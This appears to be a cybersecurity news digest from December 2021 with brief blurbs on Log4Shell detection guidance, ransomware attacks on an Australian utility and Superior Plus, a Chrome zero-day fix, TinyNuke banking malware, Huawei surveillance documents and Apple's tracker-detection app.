Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation - Microsoft Security Blog

Microsoft's unified threat intelligence team, comprising the Microsoft Threat Intelligence Center (MSTIC), Microsoft 365 Defender Threat Intelligence Team, RiskIQ, and the Microsoft Detection and Response Team (DART), among others, have been tracking threats taking advantage of CVE-2021-44228, a remote code execution (RCE) vulnerability in Apache Log4j 2 referred to as "Log4Shell".

Microsoft Security Blog

Documents link Huawei to China's surveillance programs

These marketing presentations, posted to a public-facing Huawei website before the company removed them late last year, show Huawei pitching how its technologies can help government authorities identify individuals by voice, monitor political individuals of interest, manage ideological reeducation and labor schedules for prisoners, and help retailers track shoppers using facial recognition.

Washington Post

Ransomware attack on Australian utility claimed by Russian-speaking criminals

SAN FRANCISCO, Dec 8 (Reuters) - One of the most prolific Russian-speaking ransomware gangs has claimed credit for a weekend attack on an Australian electric utility serving millions of people. Australian media reported on Monday that Chinese government hackers were behind the breach at CS Energy, which is owned by the Queensland state in northeast Australia.


Google Chrome-Emergency Security Update For 2.6 Billion As Attacks Underway

Google has confirmed yet another security update for Chrome's 2.6 billion users, and this one is an emergency fix as there's a zero-day vulnerability that attackers are already exploiting. In all, Chrome version 96.0.4664.110 fixes no less than five vulnerabilities: four are high-rated, and one is critical.


TinyNuke Banking Malware Targets French Entities | Proofpoint US

Proofpoint researchers identified ongoing activity from the banking malware TinyNuke. The activity nearly exclusively targets French entities and organizations with operations in France. The campaigns leverage invoice-themed lures targeting entities in manufacturing, industry, technology, finance, and other verticals. The new activity demonstrates a re-emergence of the malware specifically targeting French users that peaked in popularity in 2018.


Apple launches AirTags and Find My app for Android, in effort to boost privacy

Apple has released a new Android app called Tracker Detect, designed to help people who don't own iPhones or iPads to identify unexpected AirTags and other Find My network-equipped sensors that may be nearby. The new app, which Apple released on the Google Play store Monday, is intended to help people look for item trackers compatible with Apple's Find My network.


Learn the Top Five Security Practices

During this live event, we reveal the top five security practices, based on data from our new Security Outcomes Study, Volume 2 cybersecurity report.


Log4Shell: Reconnaissance and post exploitation network detection

Note: This blogpost will be live-updated with new information. NCC Group's RIFT is intending to publish PCAPs of different exploitation methods in the near future - last updated December 12th at 19:15 UTC tl;dr In the wake of the CVE-2021-44228 (a.k.a. Log4Shell) vulnerability publication, NCC Group's RIFT immediately started investigating the vulnerability in order to...

NCC Group Research

Billion-dollar natural gas supplier Superior Plus hit with ransomware | ZDNet

Major natural gas supplier Superior Plus announced on Tuesday that it is suffering from a ransomware attack. The billion dollar propane seller said the incident started on December 12 but did not respond to questions about which ransomware group was behind the attack or which systems exactly were affected.